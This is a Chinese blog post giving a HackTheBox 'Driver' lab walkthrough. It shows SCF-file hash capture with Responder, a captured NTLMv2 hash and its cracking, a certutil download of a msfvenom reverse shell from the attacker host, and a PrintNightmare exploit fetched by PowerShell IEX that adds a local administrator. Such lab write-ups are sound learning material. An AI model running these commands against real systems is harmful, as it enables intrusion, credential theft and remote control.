freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

hackthebox machine driver wp
2021-11-21 22:51:38

目标:10.10.11.106

首先利用rustscan进行端口扫描

image.png

开放了445端口,尝试利用smbclient进行匿名连接

smbclient -L 10.10.11.106

image.png

接着使用部分弱口令进行尝试,失败

smbclient -L 10.10.11.106 -U admin%password

接着访问80端口,利用admin/admin成功进入,经过翻阅,找打一处文件上传

image.png
尝试上传shell,不过没有上传后的地址,此路不通,此时仔细看看这句英文,大概意思就是会上传到一个文件共享目录

image.png)

所以便可以尝试利用smb下的SCF File Attacks

参考:https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

首先本地写上scf文件

image.png

[Shell]
Command=2
IconFile=\\10.10.16.11\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

接着kali设置reponse

responder -wrf -I tun0

image.png

等待受害者浏览共享文件时本地会接收到hash

image.png

tony::DRIVER:461fbfd7a35f9cb6:A3F711C5FE41B0EBED75AC1B3ABEA8C5:010100000000000080A2438866DBD70138ACB8F116FA712D00000000020008004E0046004400510001001E00570049004E002D00450046004E005500510054004B004D00460059004C0004003400570049004E002D00450046004E005500510054004B004D00460059004C002E004E004600440051002E004C004F00430041004C00030014004E004600440051002E004C004F00430041004C00050014004E004600440051002E004C004F00430041004C000700080080A2438866DBD7010600040002000000080030003000000000000000000000000020000095B7C01109A64478769C0BE0C98A7A5CCD0E0D050E2D6221B2AE94288E600F060A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0031003100000000000000000000000000

格式是:

username::domain:server challenge:HMAC:NTLMv2 Response 去除HMAC的剩下部分

接下来使用hashcat进行解密

hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt -o password.txt

解密成功,获取密码为liltony

image.png

这里需要get一个新知识点,winrm

参考:https://pentestlab.blog/2018/05/15/lateral-movement-winrm/

由于端口扫描发现winrm 5985端口开放,则使用evil-winrm 进行尝试

首先尝试传递hash,失败

image.png

也别折腾了,知道密码了直接上密码

image.png

image.png

下一步便是提权了,这里首先尝试msf上线,但是现在问题是如何将文件下载,经过搜索,此时发现了新大陆,certutil.exe这是Windows 操作系统上预装的工具,可用于 校验文件MD5、SHA1、SHA256,下载恶意文件和免杀。

我们可以使用

certutil.exe -urlcache -f url 进行下载文件

本地生成木马文件test.exe后,利用python启动临时http服务来提供下载

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.11 LPORT=7777 -f exe -o test.exe
python3 -m  http.server

接着目标主机执行

certutil.exe -urlcache -f http://10.10.16.11:8000/test.exe test.exe

image.png

执行后msf端已经接受了会话

image.png

尝试getsystem失败,令牌窃取等方式同样失败

image.png

接下来就得考虑其他方式提权了,看到网站80大概率是一个打印机服务,首先看看具体是什么

image.png

正好此时通过搜索找到今年一个新的打印机(print spooler)漏洞CVE-2021-1675

exp地址:

exp1(python版本):https://github.com/cube0x0/CVE-2021-1675

exp2(ps1版本): https://github.com/calebstewart/CVE-2021-1675

最开始利用python版本进行攻击,流程如下,首先根据其提示更换impacket

image.png

然后再攻击机上设置smb配置

image.png

然后攻击机上tmp目录下生成payload并开启smb

msfvenom -p windows/shell/reverse_tcp lhost=10.10.16.11 lport=7777 -f dll > carl.dll

image.png

接着使用exp并监听777端口

python3 CVE-2021-1675.py driver/tony:liltony@10.10.11.106 "\\10.10.16.11\tmp\carl.dll"

很遗憾出现了如下错误,已经在github上提交了issue,等大佬帮忙解答吧

image.png

那么便使用第二个powershell脚本exp吧,老样子本地开始http服务,evil-winrm上,也就是受害主机上执行

IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.11:8000/CVE-2021-1675.p s1')

由于通过evil-winrm获取的是powershell,所以直接远程执行脚本

执行后通过exp的攻击代码

Invoke-Nightmare -NewUser "carl" -NewPassword "123"

来添加账户为carl密码为123的本地管理员

image.png

接着使用evil-winrm使用新账户登录即可获取权限


最后和刚接触hackthebox的同学说下关于连接hackthebox的靶机网络问题我是怎么解决的,首先在htb上下载vp连接配置文件,我放到了我的虚拟机kali中运行,这是为了方便反弹shell等功能,接着使用ssh 进行socks5代理转发使我的物理机也能访问靶机,命令为

ssh -D 7777 carl@192.168.31.128 -N

这条命令的意思便是当我访问本地7777端口时,请求流量会转到我的kali虚拟机192.168.31.128上,我的kali上运行着靶机连接htb的vp,那么便实现了流量转发,如果有师傅有更好的方式欢迎分享

# 渗透测试 # 黑客 # web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者